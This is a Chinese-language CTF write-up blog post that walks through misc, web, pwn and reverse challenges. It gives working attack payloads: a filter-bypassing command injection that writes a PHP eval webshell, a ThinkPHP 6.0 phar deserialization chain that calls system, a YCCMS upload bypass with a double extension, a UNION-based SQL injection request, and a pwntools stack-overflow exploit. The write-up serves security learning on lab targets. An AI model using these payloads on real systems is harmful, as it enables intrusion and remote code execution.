本文最后更新于 430 天前,其中的信息可能已经有所发展或是发生改变。
去关注公众号发个消息就给flag没啥好说的
附件是个压缩包,下载下来爆破密码
调整图像高度就能看见隐藏的部分
复制两个出来扫码即可
hex -> base64 -> base32 -> base64
这题说是要点28800次按钮给flag那肯定不可能真点
这种题一般在flag都是在js里面,这题在main.js中,这个var1 base64解码了就是
又是一道签到题,很简单
那这就去看看robots.txt文件呗
右键禁用去设置里面点开发者工具就行了,不一定要右键
刷新源代码里面出flag
这题的难度稍微上来了一点
<?php
error_reporting(0);
if(isset($_REQUEST["cmd"])){
$shell = $_REQUEST["cmd"];
$shell = str_ireplace(" ","",$shell);
$shell = str_ireplace("\n","",$shell);
$shell = str_ireplace("\t","",$shell);
$shell = str_ireplace("?","",$shell);
$shell = str_ireplace("*","",$shell);
$shell = str_ireplace("<","",$shell);
$shell = str_ireplace("system","",$shell);
$shell = str_ireplace("passthru","",$shell);
$shell = str_ireplace("ob_start","",$shell);
$shell = str_ireplace("getenv","",$shell);
$shell = str_ireplace("putenv","",$shell);
$shell = str_ireplace("mail","",$shell);
$shell = str_ireplace("error_log","",$shell);
$shell = str_ireplace("`","",$shell);
$shell = str_ireplace("exec","",$shell);
$shell = str_ireplace("shell_exec","",$shell);
$shell = str_ireplace("echo","",$shell);
$shell = str_ireplace("cat","",$shell);
$shell = str_ireplace("ls","",$shell);
$shell = str_ireplace("nl","",$shell);
$shell = str_ireplace("tac","",$shell);
$shell = str_ireplace("bash","",$shell);
$shell = str_ireplace("sh","",$shell);
$shell = str_ireplace("tcp","",$shell);
$shell = str_ireplace("base64","",$shell);
$shell = str_ireplace("flag","",$shell);
$shell = str_ireplace("cp","",$shell);
exec($shell);
}else{
highlight_file(__FILE__);
}
其实也就是绕过这些过滤来执行命令,然后exec执行cmd不会有回显,那就直接写shell来拿flag。
先截取<?php,再双写绕过写入eval函数
?cmd=head${IFS}-1${IFS}index.php>a.php;ecechoho${IFS}"eval(\$_POST[cmd]);">>a.php
然后蚁剑连即可
通过浏览器插件知道是php的网站,写个不存在的路由看看报错,这里是thinkphp6.0
thinkphp6.0最出名的就是反序列化的洞了,这题的反序列化点应该就是上传文件的位置了,以前做过类似的题,能联想到phar协议来触发这个反序列化洞,接下来的步骤就是生成phar文件了
生成phar文件需要修改php.ini中的配置
<?php
namespace think;abstract
class Model{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
private $exists;
private $force;
protected $table;
function __construct($obj = '')
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj;
}
}
namespace think\model\concern;
trait Attribute{
private $data = ["Lethe" => "id"];
private $withAttr = ["Lethe" => "system"];
}
namespace think\model;
use think\Model;
class Pivot extends Model{}
$a = new Pivot();
$b = new Pivot($a);
use Phar;
@unlink("SKI12.phar");
$phar = new Phar("SKI12.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($b);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
依次查看文件,查看flag
拿到flag
YCCMS代码审计(新手教学方向) - 0DayBug - 博客园 (cnblogs.com)
这其实是一道代码审计题,访问/www.zip 能获得源码,再搜索YCCMS就能搜索到对应的漏洞,这题用来个漏洞构成了一个利用链,稍微修改了一下原本的代码。
修改管理员密码
这一步要注意不要修改用户名,文件上传时要求用户为admin
稍微审计下源码就能发现上传漏洞的位置就是这个上传LOGO,抓包修改绕过过滤
这个绕过真的是简单的不能再简单了,以 "."为分割将文件名打散成数组,然后取第二个shell.png.php就绕过了
private $typeArr = array('jpeg','jpg','png','gif'); //类型合集
//验证类型
private function checkType() {
if (!in_array(explode('.',$this->name)[1],$this->typeArr)) {
Tool::alertBack('警告:不合法的上传类型!');
}
}
然后文件上传后的路径就是后台logo里的路径,然后还修改了下文件名,不过后缀没变就行
//设置新文件名
private function setNewName() {
$_nameArr = explode('.',$this->name);
$_postfix = $_nameArr[count($_nameArr)-1];
//$_newname = date('YmdHis').mt_rand(100,1000).'.'.$_postfix;
$_newname = 'logo.'.$_postfix;
$this->linkpath = UPLOGO.$_newname;
return $this->path.$_newname;
}
/view/index/images/logo.php
greatwall2021 | FYHSSGSS's blog
偷鸡解,因为这题一出来就被人秒了,而且代码量还挺大,猜测是有原题,去google搜了一下,还真有
发现是长城杯2021决赛的题去搜了第二篇,直接就拿下了
POST /search HTTP/1.1
Host: 7b5da769-56bb-4c55-bb95-fcdd7957a989.node.honkersecuritycommando.site:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://7b5da769-56bb-4c55-bb95-fcdd7957a989.node.honkersecuritycommando.site:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 91
{
"votes":1,
"name": "1' union select 123,secret,3 from token --+",
"name":[
]
}
然后用获得的token访问就解决了
/flag%3faction=readFlag&token=re@l1y_4th_T0k3n
下载了文件盲猜是64位的,懒得checksec看了,ida64打开
这都不用看了,最基础的栈溢出,有backdoor,地址是0x400741,直接溢出到这个地址就行
溢出到返回地址,将返回地址覆盖为backdoor,长度为0x40+0x8
from pwn import *
# hsc2019.site:10929
p = remote('hsc2019.site',10929)
system_addr = 0x400741
buf = b'a' * (0x40 + 0x8) + p64(system_addr)
p.sendline(buf)
p.interactive()
输入内容后会调用flag函数来计算值
脚本爆破
str1 = "igdb~Mumu@p&>%;%<$<p"
def flag(a1,a2):
v3 = a1
if (a2 > 9):
if ((a2 & 1) == 0):
v3 = a1 - 11
if (a2 % 2 == 1):
v3 += 13
else:
if ((a2 & 1) == 0):
v3 = a1 - 3
if (a2 % 2 == 1):
v3 += 5
return v3
for i in range(50):
print(chr(flag(ord(str1[i]),i)),end="")
浏览量: 122